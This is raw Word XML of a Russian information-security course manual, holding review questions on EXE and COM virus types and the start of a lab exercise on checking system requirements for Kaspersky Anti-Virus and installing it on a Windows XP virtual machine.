      </w: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Pr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>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D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Классификация EXE-вирусов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Способы заражения EXE-файлов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Вирусы, замещающие программный код.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Вирусы-спутники.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:ind w:firstLine="709"/>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color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Алгоритм работы простейших COM-вирусов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Методы запуска COM-вирусов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Способы внедрения COM-вирусов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Структура и процесс загрузки EXE-программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="148" w:name="_Toc416089973"/>
      <w:bookmarkStart w:id="149" w:name="_Toc503720812"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="150" w:name="_Toc3811343"/>
      <w:bookmarkEnd w:id="148"/>
      <w:bookmarkEnd w:id="149"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Практическая</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t xml:space="preserve"> работа </w:t>
      </w:r>
      <w:r>
        <w:t>23</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>. Установка и предварительная настройка А</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>тивируса Касперского</w:t>
      </w:r>
      <w:bookmarkEnd w:id="150"/>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b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Цель работы:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Эта </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Практическая</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> работа позволяет освоить процесс уст</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">новки и первичной настройки </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивируса Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> на локальный комп</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ютер</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>См. к предыдущей ЛР.</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51" w:name="_Toc3811344"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Задание:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="151"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="152" w:name="_Toc3811345"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Изучить системные требования антивируса и сравнить их с параметрами компьютера, установить и настроить Антивирус Касперского.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="152"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="153" w:name="_Toc3811346"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Порядок выполнения работы:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="153"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>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54" w:name="_Toc3811347"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Включить компьютер (при загрузке выбрать пункт 4);</w:t>
      </w:r>
      <w:bookmarkEnd w:id="154"/>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55" w:name="_Toc3811348"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Запустить программу Microsoft Virtual PC;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="155"/>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56" w:name="_Toc3811349"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Загрузить образ ОС Microsoft Windows XP;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="156"/>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57" w:name="_Toc3811350"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Выполнить задания.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="157"/>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58" w:name="_Toc3811351"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Задание 1. Системные требования</w:t>
      </w:r>
      <w:bookmarkEnd w:id="158"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>При создании любого приложения программисты дают гарантию, что их продукт будет работать на технике с определенными характеристиками. Это требования к программному обеспечению. Бывают также требования к апп</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ратному обеспечению - в этом случае постулируется необходимость наличия на компьютере некоторого минимального объема оперативной памяти (если ее меньше, то программа будет очень медленно работать или же не запустится в</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">все), свободного пространства на диске (для размещения всех необходимых в работе приложения файлов), тактовой частоты процессора, от которой зависит производительность компьютера и другое.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 случае антивирусных программ часто выдвигается дополнительное требование отсутствия на компьютере другого антивирусного средства, со</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>местная работа с которым может вызвать конфликты (при установке любой а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тивирусной программы, установщик выводит предупреждение: если на комп</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ютере установлено другое антивирусное программное обеспечение, могут во</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">никнуть конфликтные ситуации). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Системные требования обычно приводятся в сопровождающем дистриб</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">тив текстовом файле и/или в документации к продукту. Также всегда с ними можно ознакомиться на сайте компании-производителя.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этом задании нужно сравнить системные требования </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивируса Ка</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>перского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> с конфигурацией Вашего компьютера и убедиться, что установка эт</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">го приложения возможна. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Узнайте версию операционной системы, в которой Вы работаете. Для этого найдите иконку </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Мой компьютер</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, выведите ее контекстное меню (щелкнув на ней правой кнопкой мыши) и выберите пункт </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Свойства</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2324100" cy="2232660"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="60" name="Рисунок 60" descr="http://www.intuit.ru/department/security/antiviruskasp/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intuit.ru/department/security/antiviruskasp/11/2-1.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId149" r:link="rId150">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2324100" cy="223266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1"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Открывшееся окно </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Свойства системы</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> содержит основные свед</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ния о компьютере и установленной на нем операционной системе. На первой закладке, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Общие</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, представлена сводная информация, в том числе название и версия операционной системы. На картинке это </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Microsoft Windows XP Professional</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> с установленным </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Service Pack 2</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Запомните название и версию Вашей операционной системы </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2987040" cy="3421380"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="61" name="Рисунок 61" descr="http://www.intuit.ru/department/security/antiviruskasp/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intuit.ru/department/security/antiviruskasp/11/2-2.jpg"/>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2987040" cy="342138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1"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивирусу Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> может быть установлен на операцио</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ную систему </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">"Microsoft Windows XP Home Edition или XP Professional (Service Pack 1 или выше)". </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Далее необходимо убедиться, что конфигурация системы позволяет установить </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивирус Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Для этого вернитесь к окну </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Свойства системы</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и убедитесь, что установленная операционная система соответствует требованиям Антивируса Касперского.</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2987040" cy="3421380"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="62" name="Рисунок 62" descr="http://www.intuit.ru/department/security/antiviruskasp/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intuit.ru/department/security/antiviruskasp/11/2-3.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId151" r:link="rId153">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2987040" cy="342138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p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Проверьте наличие свободного места на диске. Для этого откройте папку </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Мой компьютер</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и задержите на пару секунд курсор мыши над иконкой системного диска. В появившемся сообщении будет указан объем свободного пространства на нем и общий объем диска</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4290060" cy="2316480"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="63" name="Рисунок 63" descr="http://www.intuit.ru/department/security/antiviruskasp/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ntuit.ru/department/security/antiviruskasp/11/2-4.jpg"/>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4290060" cy="2316480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Далее необходимо ознакомиться со списком установленных на компьютер программ и убедиться, что среди них нет других антивирусов</w:t>
      </w:r>
      <w:hyperlink r:id="rId156" w:tgtFrame="_blank" w:history="1"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Для этого вызовите </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
